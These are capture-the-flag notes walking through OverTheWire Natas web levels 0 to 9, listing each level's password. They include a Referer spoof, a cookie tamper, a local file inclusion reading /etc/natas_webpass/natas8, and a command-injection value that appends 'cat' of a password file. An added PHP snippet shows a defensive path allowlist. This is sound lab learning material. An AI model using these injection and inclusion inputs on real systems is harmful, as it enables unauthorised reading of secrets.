forked from Shiva108/CTF-notes
<h1>Natas overthewire.org Labs</h1>
Username: natas0
Password: natas0
URL: http://natas0.natas.labs.overthewire.org
All passwords are also stored in /etc/natas_webpass/
E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5
The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto
<h2>Natas0</h2>
..
<div id="content">
You can find the password for the next level on this page.
<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
</div>
</body>
</html>
Password seems to be generated.
<h2>Natas1</h2>
ctrl+u
..
</pre>
<h1>natas1</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!
<!--The password for natas2 is ******************************** --></div>
<pre>
ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
<h2>Natas2</h2>
..
</pre>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img alt="" src="files/pixel.png"></div>
<pre>
http://natas2.natas.labs.overthewire.org/files/users.txt
# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH
<h2>Natas3</h2>
Google dork:
site:http://natas3.natas.labs.overthewire.org/
Google output:
directory listing - OverTheWire
natas3.natas.labs.overthewire.org/s3cr3t/
http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt
Google "site:" search
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
<h2>Natas4</h2>
Use the Firefox add-on Tamper Data or RefControl to change the Referer header.
Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
Modify the referer field from ‘natas4.natas.labs.overthewire.org’
to ‘natas5.natas.labs.overthewire.org’
(using proxy Intercept "forward" step by step)
<h2>Natas5</h2>
Cookie: __cfduid=dd27015b150c946e18046c9fdc6bd170c1507474900; loggedin=0
In Proxy Intercept step by step:
Use Burp Suite Repeater, set loggedin=1
natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
<h2>Natas6</h2>
..
</pre>
<h1>natas6</h1>
<div id="content">
<?
include "includes/secret.inc";
..
http://natas6.natas.labs.overthewire.org/includes/secret.inc
<!--?
$secret = "FOEIUWGHFEEUHOFUOIU";
?-->
natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
<h2>Natas7</h2>
Click a link, e.g. "home":
http://natas7.natas.labs.overthewire.org/index.php?page=home
REMEMBER:
All passwords are also stored in /etc/natas_webpass/
E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
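Added example (not from the original notes or the Natas source): the request above succeeds because the `page` value is used as a file path exactly as given. This PHP check confines the parameter to an allowlisted pages directory, so an absolute path such as /etc/natas_webpass/natas8 is rejected. The function name `resolve_page` and the temporary pages directory are assumptions for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Map a user-supplied page name to a file inside $baseDir.
 * Returns the canonical path, or null when the input is rejected.
 * (Hypothetical helper, not part of any Natas level.)
 */
function resolve_page(string $page, string $baseDir): ?string
{
    // 1. Accept only short, simple names. This rejects absolute paths,
    //    "../" sequences, NUL bytes and stream wrappers such as php://.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/i', $page)) {
        return null;
    }

    // 2. Canonicalise and confirm the file exists under the base
    //    directory (realpath also resolves symlinks).
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway pages directory holding one page.
$dir = sys_get_temp_dir() . '/pages_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/home.php', '<p>home</p>');

// Constructed inputs: one valid name, one missing page, and three
// values that must never reach include/readfile.
$inputs = ['home', 'about', '/etc/natas_webpass/natas8', '../home', 'home.php'];
foreach ($inputs as $input) {
    $resolved = resolve_page($input, $dir);
    printf("%-28s => %s\n", $input, $resolved === null ? 'rejected' : 'served');
}

// Clean up the demo directory.
unlink($dir . '/home.php');
rmdir($dir);
```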
<h2>Natas8</h2>
Source code link: $encodedSecret = "3d3d516343746d4d6d6c315669563362";
Run through a PHP script:
#!/usr/bin/php
<?php
// This PHP code reverses the following process:
// bin2hex(strrev(base64_encode($secret)))
// The string to decode is '3d3d516343746d4d6d6c315669563362'.
echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));
?>
Result: oubWYf2kBq
Or (put in a PHP file and run):
<?php
// Undo the encoding chain: hex -> reverse -> base64.
echo base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362")));
?>
Natas9 W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
<h2>Natas9</h2>
If the word is in the dictionary, we can run a command after the ";"
(Read the html file / source code to find out)
win; cat /etc/natas_webpass/natas10 #
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
<h2>Natas10</h2>